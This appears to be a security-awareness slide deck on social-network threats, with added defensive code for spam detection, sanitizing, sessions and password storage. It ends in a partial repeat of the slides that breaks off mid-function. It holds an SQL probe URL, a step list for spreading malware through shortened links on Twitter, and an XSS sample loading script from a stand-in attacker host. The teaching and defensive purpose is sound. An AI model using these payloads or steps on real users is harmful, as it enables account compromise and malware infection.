SECURITY & PRIVACY ON SOCIAL NETWORKS

Omar M Alsuhaibany
CISSP, GCFA, ISO 27001 LA

It’s not only about Facebook :)
Before Social Networks

[Slide diagram: Social Networks]
A Social Networks definition

Wikipedia defines it as:
  A social network is a social structure made up of individuals (or organizations) called "nodes", which are tied (connected) by one or more specific types of interdependency, such as friendship, kinship, common interest, financial exchange, dislike, or relationships of beliefs, knowledge or prestige.
Examples of Social Networks?

- Facebook
- LinkedIn
- Twitter

Even more media:
- RSS Feeds
- Blogs
- Wikis
- Web Chat
- Podcasts
- Mashups
- Photo/Video-sharing
- Virtual Worlds
Common Web 2.0 Vulnerabilities

- Phishing
- Spam
- Malware
- Cross Site Scripting
- SQL Injection
- Authentication and Authorization Flaws
- Information Leakage
- Insecure Storage
- Insecure Communications
Some Web 2.0 Specific Vulnerabilities

On top of that list we do have some specific Web 2.0 vulnerabilities:
- XSS Worms
- Feed Injections
- Mashup and Widget Hacks
Well, first things first: Passwords!!!

- Is it a new thing? No, however it’s different.
- Password sloth. Using the same password on several sites is like trusting the weakest link in a chain to carry the same weight.
- Using the same password as your email when the login username is your email!!
- According to FB stats, more than 50% use the same password.
- Avoid using the same password on multiple sites.
- Do not synchronize account information with organization login credentials.
Phishing

Major phishing attempts:
- Simple "look at this" message
- Users directed to fbstarter.com, fbaction.net
- Phished credentials used to automatically log in and send more mail
- Some users report passwords changed

- Phishtank reports Facebook as the 7th most common target
- Behind only banks, PayPal and eBay
- "Social Phishing" is far more effective
- 72% successful in a controlled study
- No TLS for the login page
- No anti-phishing measures
- Frequent genuine emails with login links
- Users don't consider social networks' passwords as valuable
- Web 2.0 sites encourage password sharing…
- Facebook is doing a good job, but still!
Spam

- Spam is not only for spamming purposes! Although annoying.
- All new types: followers, friend requests, fake accounts

Fighting the Spam
- Automatically detect spammer profiles:
  - analyze link history
  - analyze graph structure
  - analyze profile
- Aggressively request CAPTCHAs
- User feedback
- Classifiers:
  - String blocking
  - Hashing
  - Machine Learning
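The three detection signals listed above (link history, graph structure, profile) and the "hashing" classifier can be sketched in a few dozen lines. The following is an added example written for this page, not code from the deck or from any social network; the profiles, weights and thresholds are constructed for illustration and would need tuning against real labelled data.

```python
import hashlib
import re
from collections import Counter
from dataclasses import dataclass, field

HOST_RE = re.compile(r"https?://([^/\s]+)")   # captures the linked host
URL_RE = re.compile(r"https?://\S+")          # whole URL, for normalisation


@dataclass
class Profile:
    """Constructed stand-in for an account: recent posts plus its social graph."""
    name: str
    posts: list
    following: set = field(default_factory=set)
    followers: set = field(default_factory=set)
    age_days: int = 365


def link_history_score(p):
    """Share of posts carrying links, and how concentrated the linked hosts are."""
    if not p.posts:
        return 0.0
    hosts = [m.group(1).lower() for post in p.posts for m in HOST_RE.finditer(post)]
    link_ratio = sum(1 for post in p.posts if HOST_RE.search(post)) / len(p.posts)
    top_share = Counter(hosts).most_common(1)[0][1] / len(hosts) if len(hosts) >= 3 else 0.0
    return 0.6 * link_ratio + 0.4 * top_share


def graph_score(p):
    """Spammers follow far more accounts than follow them back."""
    if not p.following:
        return 0.0
    reciprocal = len(p.following & p.followers) / len(p.following)
    fan_out = len(p.following) / (len(p.followers) + 1)
    return 0.5 * (1 - reciprocal) + 0.5 * min(fan_out / 20, 1.0)


def profile_score(p):
    """A days-old account already posting at volume is suspicious."""
    return 1.0 if p.age_days < 7 and len(p.posts) > 20 else 0.0


def message_fingerprint(text):
    """Hash of the normalised message (case folded, URLs and numbers replaced),
    so near-identical spam variants collapse onto one fingerprint."""
    norm = URL_RE.sub("URL", text.lower())
    norm = re.sub(r"\d+", "N", norm)
    norm = re.sub(r"\s+", " ", norm).strip()
    return hashlib.sha256(norm.encode()).hexdigest()[:16]


def duplicate_ratio(p):
    """Fraction of posts whose fingerprint is shared with another post."""
    if not p.posts:
        return 0.0
    counts = Counter(message_fingerprint(t) for t in p.posts)
    return sum(c for c in counts.values() if c > 1) / len(p.posts)


def classify(p, threshold=0.5):
    """Weighted blend of the signals; weights are illustrative, not tuned."""
    score = (0.3 * link_history_score(p) + 0.3 * graph_score(p)
             + 0.2 * profile_score(p) + 0.2 * duplicate_ratio(p))
    return round(score, 3), ("spammer" if score >= threshold else "ok")


# Constructed sample accounts (not real users).
SPAMMER = Profile(
    name="deals4u",
    posts=[f"Win a free iPhone {i}! http://cheap-meds.example/offer?id={i}" for i in range(30)],
    following={f"u{i}" for i in range(200)},
    followers={"u1", "u2"},
    age_days=2,
)
REGULAR = Profile(
    name="alice",
    posts=["Had a great weekend hiking", "Anyone up for coffee tomorrow?",
           "New photos http://photos.example/album/1", "Loved the concert last night",
           "Back to work"],
    following={"a", "b", "c", "d"},
    followers={"a", "b", "c", "e"},
    age_days=400,
)

if __name__ == "__main__":
    for p in (SPAMMER, REGULAR):
        print(p.name, classify(p))
```

The hashing step is what makes "string blocking" survive trivial edits: an operator blocks one fingerprint and every variant that differs only in numbers or the shortened URL is caught with it.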
Cross Site Scripting (XSS)

- New to Web 2.0? No
- Is this worse in Web 2.0? Yes
  XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content.
XSS Worms

- New to Web 2.0? Yes
  - Self-propagating XSS code injected into a web application, which spreads when users visit a page.
  - The first XSS worm, 4 years ago, spread through MySpace
  - 1 million+ infections in 24 hours
Feed Injections

- New to Web 2.0? Yes
  - Feed aggregators have data coming from various untrusted sources. The data being received can be malicious and exploit users.
  - Remote Zone Risks
  - Web browsers or web based readers are in this category
  - Attacks such as XSS and CSRF possible
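The XSS definition above says the fix is encoding untrusted content; the feed-injection slide shows the harder case, where the untrusted content is HTML the reader is expected to render. The following added example (written for this page, not code from the deck or from any feed reader) handles both: plain text is HTML-encoded, while feed item bodies go through an allowlist sanitizer that keeps harmless formatting, drops script-bearing elements with their content, and refuses non-http(s) link targets. The RSS document is constructed for the demonstration.

```python
import html
import xml.etree.ElementTree as ET
from html.parser import HTMLParser
from urllib.parse import urlsplit


def render_comment(author, text):
    """Text context: encode, so the browser sees data rather than markup."""
    return f'<p class="comment"><b>{html.escape(author)}</b>: {html.escape(text)}</p>'


# HTML context (feed bodies): allowlist, because encoding would destroy the post.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href"}}
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed"}


class FeedSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0          # > 0 while inside a dropped element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return                   # unknown tag: keep its text, lose the tag
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue             # on* handlers, style, etc. never survive
            if name == "href" and urlsplit(value).scheme not in ("http", "https"):
                continue             # javascript:, data: and friends are dropped
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag == "br":
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data))


def sanitize_html(fragment):
    s = FeedSanitizer()
    s.feed(fragment)
    s.close()
    return "".join(s.out)


def sanitize_feed(rss_xml):
    """Return (escaped title, sanitized description) for every item in the feed."""
    root = ET.fromstring(rss_xml)
    return [(html.escape(item.findtext("title", default="")),
             sanitize_html(item.findtext("description", default="")))
            for item in root.iter("item")]


# Constructed feed: one harmless item and one carrying an injection attempt.
SAMPLE_RSS = """<rss version="2.0"><channel><title>Constructed feed</title>
<item><title>Harmless post</title>
<description><![CDATA[<p>Read <a href="https://blog.example/post">more</a></p>]]></description></item>
<item><title>Injected item &lt;b&gt;</title>
<description><![CDATA[<p onclick="steal()">Hi</p><script>steal()</script><a href="javascript:steal()">click</a>]]></description></item>
</channel></rss>"""

if __name__ == "__main__":
    for title, body in sanitize_feed(SAMPLE_RSS):
        print(title, "=>", body)
```

Both paths share one rule: decide the output context first, then apply the treatment that fits it; a sanitizer applied to a plain-text field, or an encoder applied to a field that must render HTML, is the usual source of either a hole or a broken page.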
Mashup and Widget

- New to Web 2.0? Yes
  Mashups and Widgets are core components in Web 2.0 sites. The rich functionality they provide can be exploited by attackers through attacks such as XSS.
- The mashup site is the middleman, do you trust it?
- Multiple inputs, one output
- Mashup communications could leak data
- Mashups require cross domain access.
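"Mashups require cross domain access" is where data leaks are typically introduced: a server that hands out cross-origin read access to whoever asks lets any page the user visits read the user's data. The following added example (written for this page; the deck itself names no mechanism, and CORS is assumed here as the cross-domain channel) shows the weak response beside the corrected one, with a constructed allowlist of partner origins.

```python
from urllib.parse import urlsplit

# Constructed allowlist: the only origins whose scripts may read our responses.
ALLOWED_ORIGINS = {"https://mashup.example", "https://widgets.partner.example"}


def cors_headers_weak(origin):
    """Reflects whatever Origin arrives and allows credentials: every site on the
    web can now read the logged-in user's data through the browser."""
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true"}


def cors_headers(origin, allowlist=ALLOWED_ORIGINS):
    """Exact-match allowlist over scheme + host; unknown origins get nothing."""
    if not origin:
        return {}
    parts = urlsplit(origin)
    if parts.scheme != "https" or not parts.netloc:
        return {}
    normalized = f"{parts.scheme}://{parts.netloc}".lower()
    if normalized not in allowlist:
        return {}                    # no header at all: browser blocks the read
    return {
        "Access-Control-Allow-Origin": normalized,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",            # caches must not reuse one origin's answer
    }


if __name__ == "__main__":
    for o in ("https://mashup.example", "https://mashup.example.evil.example", "http://mashup.example"):
        print(o, "->", cors_headers(o))
```

Note that a suffix or substring check on the host would accept `mashup.example.evil.example`; only an exact match on the whole origin is safe, and `Vary: Origin` is needed so a shared cache does not replay an allowed origin's response to a different one.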
Information Leakage

- New to Web 2.0? No
- Is this worse in Web 2.0? Yes
  Applications can unintentionally leak information about their configuration, internal workings, or violate privacy through a variety of application problems.

A simple lack of error handling leaking information:
  http://www.examplesite.com/home.html?day=Monday
I add a little something onto the URL:
  http://www.examplesite.com/home.html?day=Monday AND userscolumn=2
No error handling = information leakage:
  Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server] Invalid column name
  /examplesite/login.asp, line 10

What makes this worse in Web 2.0?
- Business logic and validation moved to the client side
- Web 2.0 apps will do a lot of work on the client side: validation of data, business logic and sensitive data
- You need to back these up with server side checks
- Never assume sensitive data will be safe client side
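The leaked ODBC error above comes from two defects at once: the parameter is pasted into the SQL statement, and the raw database exception is returned to the browser. The following added example (written for this page, not code from the deck; the table and handlers are constructed, with SQLite standing in for SQL Server) reproduces the leak and then shows the server-side checks the slide asks for: an allowlist on the input, a parameterized query, and an error path that logs the detail for operators while returning only an incident reference to the caller.

```python
import logging
import sqlite3
import uuid

log = logging.getLogger("app")
VALID_DAYS = {"Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday"}


def make_db():
    """Constructed in-memory table standing in for the site's schedule data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE schedule (day TEXT, event TEXT)")
    db.executemany("INSERT INTO schedule VALUES (?, ?)",
                   [("Monday", "Team sync"), ("Friday", "Demo")])
    return db


def home_leaky(db, day):
    """The 'before': input pasted into SQL, raw exception handed to the browser."""
    try:
        rows = db.execute(f"SELECT event FROM schedule WHERE day = '{day}'").fetchall()
        return 200, [r[0] for r in rows]
    except sqlite3.Error as exc:
        return 500, str(exc)              # driver and schema details leave the server


def home_hardened(db, day):
    """Server-side validation, a parameterized query, and a generic error body."""
    if day not in VALID_DAYS:             # client-side validation is not a control
        return 400, "invalid day"
    try:
        rows = db.execute("SELECT event FROM schedule WHERE day = ?", (day,)).fetchall()
        return 200, [r[0] for r in rows]
    except sqlite3.Error as exc:
        incident = uuid.uuid4().hex[:8]
        log.error("incident %s: %s", incident, exc)   # full detail, operators only
        return 500, f"internal error (ref {incident})"


if __name__ == "__main__":
    db = make_db()
    probe = "Monday' AND userscolumn=2 --"
    print("leaky    :", home_leaky(db, probe))
    print("hardened :", home_hardened(db, probe))
    print("hardened :", home_hardened(db, "Monday"))
```

The incident reference is the compromise that keeps support workable: the user can quote it, the operator can find the full stack trace in the log, and nothing about the schema or driver is exposed in the response.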
Authentication and Authorization Flaws

- New to Web 2.0? No
- Is this worse in Web 2.0? Yes
  These flaws can lead to the hijacking of user accounts, privilege escalation, undermining of authorization and accountability controls, and privacy violations.

Authentication and Authorization Weaknesses
- Passwords with no max age, reasonable length or complexity
- Lack of brute force protection
- Broken CAPTCHA systems
- Security through obscurity

Session Management Weaknesses
- Lack of sufficient entropy in session IDs
- Predictable session IDs
- Lack of sufficient timeouts and maximum lifetimes for IDs
- Using one session ID for the whole session

What makes this worse in Web 2.0?
- CAPTCHAs are used to provide strong A+A but are often weak
- More access points in Web 2.0 applications
- The use of single sign-on leads to a single point of failure
- Growth in other attacks further undermines A+A
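The session-management and brute-force items above map onto a handful of concrete controls. The following added example (written for this page, not code from the deck or any framework) contrasts a predictable ID with one drawn from the OS CSPRNG, and implements an in-memory session store with an idle timeout, an absolute lifetime, ID rotation after login, and a failed-login lockout; the timeouts and the manual clock are constructed so the behaviour can be exercised without waiting.

```python
import secrets
import time

IDLE_TIMEOUT = 15 * 60         # seconds of inactivity before a session dies
ABSOLUTE_LIFETIME = 8 * 3600   # hard cap regardless of activity
MAX_FAILED_LOGINS = 5
LOCKOUT_SECONDS = 15 * 60


def predictable_id(counter):
    """What NOT to do: time plus a counter is guessable in a few tries."""
    return f"{int(time.time())}-{counter}"


def new_session_id():
    """256 bits from the OS CSPRNG: unguessable, effectively unique."""
    return secrets.token_urlsafe(32)


class ManualClock:
    """Constructed clock so expiry can be demonstrated without sleeping."""
    def __init__(self, start=1_000.0):
        self.t = start

    def __call__(self):
        return self.t


class SessionStore:
    def __init__(self, clock=time.time):
        self.clock = clock
        self.sessions = {}   # id -> {"user", "created", "last_seen"}
        self.failures = {}   # user -> (count, first_failure_time)

    def create(self, user):
        sid = new_session_id()
        now = self.clock()
        self.sessions[sid] = {"user": user, "created": now, "last_seen": now}
        return sid

    def rotate(self, old_sid):
        """Fresh ID after login or privilege change; the old one stops working,
        so an ID fixed or observed before authentication is worthless after it.
        The original creation time is kept so the absolute cap still applies."""
        s = self.sessions.pop(old_sid)
        sid = new_session_id()
        self.sessions[sid] = {**s, "last_seen": self.clock()}
        return sid

    def lookup(self, sid):
        s = self.sessions.get(sid)
        if s is None:
            return None
        now = self.clock()
        if now - s["last_seen"] > IDLE_TIMEOUT or now - s["created"] > ABSOLUTE_LIFETIME:
            del self.sessions[sid]
            return None
        s["last_seen"] = now
        return s["user"]

    def login_allowed(self, user):
        count, first = self.failures.get(user, (0, 0))
        return not (count >= MAX_FAILED_LOGINS and self.clock() - first < LOCKOUT_SECONDS)

    def record_failure(self, user):
        count, first = self.failures.get(user, (0, self.clock()))
        if self.clock() - first >= LOCKOUT_SECONDS:
            count, first = 0, self.clock()   # window expired: start counting again
        self.failures[user] = (count + 1, first)


if __name__ == "__main__":
    clock = ManualClock()
    store = SessionStore(clock)
    sid = store.create("alice")
    sid = store.rotate(sid)              # after successful login
    print("user:", store.lookup(sid))
    clock.t += IDLE_TIMEOUT + 1
    print("after idle timeout:", store.lookup(sid))
```

A per-user counter like this is the minimum; production systems also throttle per source address and per credential pair, and rotate the ID again whenever the session's privilege changes, not only at login.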
Insecure Storage and Communications

- New to Web 2.0? No
- Is this worse in Web 2.0? Yes
  These flaws could allow sensitive data to be stolen if the appropriate strong protections aren’t in place.

Insecure storage of data
- Not encrypting sensitive data
- Hard coding of keys and/or insecurely storing keys
- Using broken protection mechanisms (e.g. DES)
- Failing to rotate and manage encryption keys

Insecure communications
- Not encrypting sensitive data in transit
- Only using SSL/TLS for the initial logon request
- Failing to protect keys whilst in transit
- Emailing clear text passwords

What makes this worse in Web 2.0?
- More data in more places, including client side storage
- Mixing secure and insecure content on a page

And now with the Cloud!!!
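Three of the storage items above (hard-coded keys, broken mechanisms, no key rotation) and one of the communications items (emailing clear-text passwords) have standard answers that fit in one small module. The following added example (written for this page, not code from the deck) stores passwords as salted PBKDF2-HMAC-SHA256 digests with a work factor recorded in the record so it can be raised later, loads encryption keys from the environment rather than from source, and replaces the emailed password with a random single-use reset token of which only the hash is kept. The environment variable name and iteration count are assumptions.

```python
import base64
import hashlib
import hmac
import os
import secrets

PBKDF2_ITERATIONS = 600_000     # current work factor; raise it over time


def hash_password(password, iterations=PBKDF2_ITERATIONS):
    """Salted, slow, one-way. Stored form: pbkdf2_sha256$iterations$salt$digest."""
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "$".join(["pbkdf2_sha256", str(iterations),
                     base64.b64encode(salt).decode(), base64.b64encode(digest).decode()])


def verify_password(password, stored):
    algo, iters, salt_b64, digest_b64 = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported password record")
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    actual = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, int(iters))
    return hmac.compare_digest(actual, expected)   # constant-time comparison


def needs_rehash(stored):
    """True when the record was made with an older, weaker work factor;
    rehash on the next successful login to rotate it forward."""
    return int(stored.split("$")[1]) < PBKDF2_ITERATIONS


def load_key(env_var="APP_ENCRYPTION_KEY"):
    """Keys come from the deployment environment (or a secrets manager),
    never from a literal in the source tree."""
    raw = os.environ.get(env_var)
    if raw is None:
        raise RuntimeError(f"{env_var} is not set")
    key = base64.b64decode(raw)
    if len(key) < 32:
        raise ValueError("key too short for a 256-bit cipher")
    return key


def make_reset_token():
    """Password reset without emailing a password: a random single-use token.
    Returns (token for the user, hash for the database)."""
    token = secrets.token_urlsafe(32)
    return token, hashlib.sha256(token.encode()).hexdigest()


def verify_reset_token(token, stored_hash):
    return hmac.compare_digest(hashlib.sha256(token.encode()).hexdigest(), stored_hash)


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print(record)
    print("verify:", verify_password("correct horse battery staple", record))
    token, stored = make_reset_token()
    print("reset token for the user:", token, "| stored hash:", stored)
```

Recording the algorithm and iteration count inside each record is what makes rotation possible: when the work factor is raised, `needs_rehash` flags old records and they are upgraded transparently the next time the user logs in, with no mass reset.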
Browsing Habits and Experience have Changed…

- Trigger finger (clicking on everything). Inboxes contain everything from drink requests to cause requests; do not get into the click habit unless you are ready to deal with drive-by downloads and zero-day attacks.
A little on Privacy …

- 3rd Party Apps on Facebook
  - Anyone can create a Facebook app
    - Many of the agreements you must accept give the company the right to monitor your data and sell it without informing you.
    - Tracker information can be built into any application.
- Mixing personal with professional; commonly on Facebook, where one’s friends include business associates, family members and friends.
- Engaging in Tweet (or Facebook/LinkedIn/Myspace) rage. Imagine you are at a party where everyone is listening, including your boss, spouse and future employer.
Data = $$$

- Steal your money directly
- Sell your data
- Trick your friends and family into supplying personal data
- Sell your identity
- Use your accounts to spread spam, malware and more data theft scams
- Sell your organization's data or sensitive information
- Blackmail individuals and organizations
URL Shorteners Risks

- bit.ly, hex.io, zi.ma …etc
- Where will the URL take you?
- Dubious link via email? Hover your mouse or check the HTML
- A new way for email phishing scams
- DDOS with iframe
- Easily escaping spam filters
- Even more dangerous! What if the site got hacked?
- “See before you click” functionality or extensions
- Example: j.mp
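The "see before you click" advice here and the phishing slides earlier (fbstarter.com, fbaction.net, login links in mail) call for the same tool: resolve the link without a browser and judge the final destination. The following added example (written for this page, not code from the deck or any extension) does that with a constructed redirect table in place of the HTTP HEAD requests a real checker would make; the brand host list, shortener list and lookalike heuristics are assumptions for illustration, and the lookalike test is deliberately aggressive (any host containing "fb" that is not a genuine brand host is flagged).

```python
from difflib import SequenceMatcher
from urllib.parse import urlsplit

# Constructed: hosts treated as genuine for the brand, and known shorteners.
BRAND_HOSTS = {"facebook.com", "fb.com"}
SHORTENER_HOSTS = {"bit.ly", "j.mp", "hex.io", "zi.ma"}
MAX_HOPS = 5

# Constructed redirect table standing in for the HEAD requests a real tool makes.
FAKE_REDIRECTS = {
    "http://j.mp/abc1": "http://bit.ly/xyz9",
    "http://bit.ly/xyz9": "http://fbstarter.com/login.php",
    "http://bit.ly/loop": "http://bit.ly/loop",
}


def resolve(url, redirects=FAKE_REDIRECTS, max_hops=MAX_HOPS):
    """Follow the redirect chain, capped so a loop cannot hang the checker."""
    chain = [url]
    for _ in range(max_hops):
        nxt = redirects.get(chain[-1])
        if nxt is None:
            return chain, True
        chain.append(nxt)
    return chain, False                   # hops exhausted: treat as unresolved


def host_of(url):
    return (urlsplit(url).hostname or "").lower()


def is_brand_host(host, brand_hosts=BRAND_HOSTS):
    return any(host == b or host.endswith("." + b) for b in brand_hosts)


def looks_like_brand(host, brand_hosts=BRAND_HOSTS):
    """Not a genuine brand host, but built to resemble one: it embeds the brand
    token, or its registrable part is within a small edit distance of the brand."""
    if is_brand_host(host, brand_hosts):
        return False
    label = ".".join(host.split(".")[-2:])
    for b in brand_hosts:
        if b.split(".")[0] in host:
            return True
        if label != b and SequenceMatcher(None, label, b).ratio() > 0.8:
            return True
    return False


def inspect_link(href, link_text, redirects=FAKE_REDIRECTS):
    """Return the final destination plus a list of findings for the reviewer."""
    chain, resolved = resolve(href, redirects)
    final = chain[-1]
    final_parts = urlsplit(final)
    findings = []
    if host_of(href) in SHORTENER_HOSTS:
        findings.append("shortened")
    if not resolved:
        findings.append("unresolved-redirects")
    if "://" in link_text and host_of(link_text) != host_of(final):
        findings.append("text-host-mismatch")   # displayed URL is not where it goes
    if final_parts.scheme != "https" and "login" in final_parts.path.lower():
        findings.append("login-without-tls")
    if looks_like_brand(host_of(final)):
        findings.append("lookalike-host")
    return {"final": final, "chain": chain, "findings": findings}


if __name__ == "__main__":
    print(inspect_link("http://j.mp/abc1", "http://www.facebook.com/login"))
    print(inspect_link("https://www.facebook.com/", "Facebook"))
    print(inspect_link("http://bit.ly/loop", "click here"))
```

A real preview tool would swap `FAKE_REDIRECTS` for HEAD requests (never GET, and never in the user's authenticated browser session) and would keep the hop cap, since redirect loops and very long chains are themselves a warning sign.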
Malware example: Koobface

The Koobface worm and its associated botnet have gained notoriety in security circles for its longevity and history of targeting social networking sites. First surfacing in 2008 within MySpace and Facebook, the worm resurfaced in early 2009, this time targeting Twitter users.

By using phishing techniques, the message directs the recipients to a third-party website, where they are prompted to download what is purported to be an update of the Adobe Flash player.

11/10/2009 - As part of a new Koobface attack, links to Google Reader URLs controlled by cyber-criminals are being spammed by Koobface onto social network sites, including Facebook and MySpace. The hundreds of Google accounts involved host a page with a fake YouTube video. Attempts to view this supposed video expose Windows users to infection by Koobface.

Koobface ultimately attempts, upon successful infection, to gather sensitive information from the victims such as credit card numbers.
Facebook Widget Installing Spyware

- Prompts users to install the infamous "Zango" adware/spyware.
Twitter hacking example:

- Select victim group using any one of a number of Twitter trend tools.
- Select malware based on device or location info.
- Upload malware to dropbox.com and request a public link for the uploaded file.
- Use a URL shortening service to obfuscate the URL.
- Send tweet to target referencing information or post with keywords so that all individuals “tracking” the keywords will be notified of a new tweet on the subject they are tracking.
Scareware Tweets

- Scareware is fake anti-virus – instead of protecting your computer it infects it
- Scammers create multiple tweets that direct you to a scareware page. They then try to frighten you into believing you have a security problem and need their software to address it
- Other scareware attacks aim to:
  - Take control of your computer to send spam
  - Hold your computer to ransom

Result: Malware infection
Security analysis difficulties with Web 2.0

- More code and complexity in Web 2.0 apps
- At least two languages to analyze (client and server)
- User supplied code might never be reviewed
- Dynamic nature increases risk of missing flaws
- Increased amount of input points
Basics of Social Networking Security

- Never Post Personal Information Online
  - Everything you post is public information
  - If you don’t feel comfortable with everyone seeing it, then don’t put it online
- Configure security settings on all sites
  - Most websites you log into have security configurations
  - Set the privacy levels in accordance with what you are posting
- Change your Password Regularly
  - Use phrases, not words
  - Do not keep a “Master” password
- Never Trust E-mails asking for personal information
  - An official organization will never ask you to disclose any private information in order to correct an error
- Do not friend anyone you do not know and trust
  - Hackers and spammers are more clever than you think. There is a reason many online scams are called “social engineering”
- Clean out your friend list regularly
- Watch for Hacked Friend Accounts
  - Unusual posts or requests
  - Posting “shock sites”
- Beware of Third Party Apps
  - Many require you to sign an agreement giving them the right to sell your information
  - Malicious code can be written into the program
- Delete unused Apps
  - If you are not using them, then why let them potentially mine data about you?
- If you are unsure about an app, a post or anything else, then Google is your best friend
- Caution about posting your location online
  - People are watching where you will be and, more importantly, where you will not be
- Check your security settings monthly
  - Facebook sets all profiles to public with each site redesign
  - Apps may disable your security settings
  - Viruses and malware may disable your security settings
- Consider using Private Browsing
  - Private Browsing allows you to view websites without storing your history or installing cookies
  - Private Browsing shortcuts:
    - Firefox – Ctrl + Shift + P
    - Internet Explorer 8 – Ctrl + Shift + P
    - Opera – Ctrl + Shift + N
    - Google Chrome – Ctrl + Shift + N
- Don’t stay logged on
- Set your settings to high privacy and/or enable security settings on the sites you use.
- Review a given website’s privacy policy; you may be surprised at what you are actually agreeing to.
- Log off when you leave.
- Install and update antivirus software.
- Keep system software AND applications up to date.
- Make sure the connection you use is secure.
Questions?

Social networks security risks

  • 10. Phishing (cont'd)
  • 11. Phishing (cont'd)
    - Major phishing attempts
    - Simple "look at this" message
    - Users directed to fbstarter.com, fbaction.net
    - Phished credentials used to log in automatically and send more mail
    - Some users report their passwords changed
    - PhishTank reports Facebook as the 7th most common target, behind only banks, PayPal and eBay
    - "Social phishing" (the lure appears to come from a friend) is far more effective
  • 12. Phishing (cont'd)
    - 72% successful in a controlled study
    - No TLS for the login page
    - No anti-phishing measures
    - Frequent genuine emails with login links, which train users to click
    - Users don't consider social network passwords valuable
    - Web 2.0 sites encourage password sharing…
    - Facebook is doing a good job, but still!
  • 13. Phishing (cont'd)
  • 14. Phishing (cont'd)
  • 15. Spam
    - Spam is annoying, but it is not only unsolicited advertising: it is also the delivery channel for phishing links and malware
    - All new types: followers, friend requests, fake accounts
  • 16. Spam (cont'd)
    - Fighting the spam
    - Automatically detect spammer profiles: analyze link history, graph structure and profile attributes
    - Aggressively request CAPTCHAs
    - User feedback (reporting)
    - Classifiers
    - String blocking
    - Hashing (to recognise the same message posted again and again)
    - Machine learning
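The slide lists the signals (link history, graph structure, profile attributes, hashing of repeated text) without showing how they combine. The following is an added example, not code from the deck: a small additive scorer over constructed, synthetic profiles. The thresholds, the shortener blocklist and the profile fields are assumptions chosen for illustration; a production classifier would learn the weights rather than hard-code them.

```python
import hashlib
from dataclasses import dataclass, field
from typing import List

# Assumption: a tiny blocklist of link-shortener domains often seen in spam.
SHORTENER_DOMAINS = {"bit.ly", "j.mp", "tinyurl.com"}


@dataclass
class Profile:
    handle: str
    followers: int
    following: int
    account_age_days: int
    messages: List[str] = field(default_factory=list)


def message_fingerprint(text: str) -> str:
    """Hash a normalised message (lower-case, collapsed whitespace) so
    near-identical spam texts collide on the same fingerprint."""
    norm = " ".join(text.lower().split())
    return hashlib.sha256(norm.encode()).hexdigest()


def spam_score(p: Profile) -> int:
    """Additive heuristic; higher is more spam-like. Weights are assumptions."""
    score = 0
    # Graph structure: follows many accounts, followed by almost nobody.
    if p.following >= 10 * max(p.followers, 1):
        score += 2
    # Profile: brand-new accounts are cheap to create and throw away.
    if p.account_age_days < 7:
        score += 1
    # Link history: nearly every message carries a shortened link.
    links = [m for m in p.messages if any(d in m for d in SHORTENER_DOMAINS)]
    if p.messages and len(links) / len(p.messages) > 0.8:
        score += 2
    # Hashing: the same text posted over and over.
    fingerprints = {message_fingerprint(m) for m in p.messages}
    if len(p.messages) >= 5 and len(fingerprints) <= len(p.messages) // 2:
        score += 2
    return score


def flag_spammers(profiles: List[Profile], threshold: int = 4) -> List[str]:
    """Handles of profiles whose score reaches the (assumed) threshold."""
    return sorted(p.handle for p in profiles if spam_score(p) >= threshold)


# Constructed sample data; none of this is real account data.
SAMPLE = [
    Profile("alice", followers=300, following=280, account_age_days=900,
            messages=["Lunch with the team today", "New blog post up",
                      "Anyone at the conf?"]),
    Profile("promo_bot_42", followers=3, following=4000, account_age_days=2,
            messages=["OMG look at this http://bit.ly/xyz"] * 4 +
                     ["omg  LOOK at this  http://bit.ly/xyz",
                      "free stuff http://j.mp/abc"]),
]

if __name__ == "__main__":
    for p in SAMPLE:
        print(p.handle, spam_score(p))
    print("flagged:", flag_spammers(SAMPLE))
```

The fingerprint step is the "hashing" item on the slide: it lets a site count repeats cheaply without storing every message in full, and the whitespace/case normalisation defeats the trivial variations spammers use to dodge exact-match string blocking.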
  • 17. Cross Site Scripting (XSS)
    - New to Web 2.0? No
    - Is this worse in Web 2.0? Yes
    - XSS flaws occur whenever an application takes user-supplied data and sends it to a web browser without first validating or encoding that content.
  • 18. XSS Worms
    - New to Web 2.0? Yes
    - Self-propagating XSS code injected into a web application, which spreads when users visit a page.
    - First XSS worm, 4 years ago, spread through MySpace (the 2005 "Samy" worm)
    - 1 million+ infections in 24 hours
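A worm like the one on slide 18 lives in a stored profile field that every visitor's browser renders. Below is an added example (not the deck's code) of the defect and the fix on slide 17 in server-side Python: the same hostile "about me" value is emitted once without encoding and once HTML-encoded, plus a guard for user-supplied links, which are a second common injection point. The sample input and the hostname attacker.example are constructed for the example.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample input: a profile field as an attacker might submit it.
HOSTILE_ABOUT_ME = '<script src="http://attacker.example/w.js"></script> I love Web 2.0'


def render_profile_vulnerable(about_me: str) -> str:
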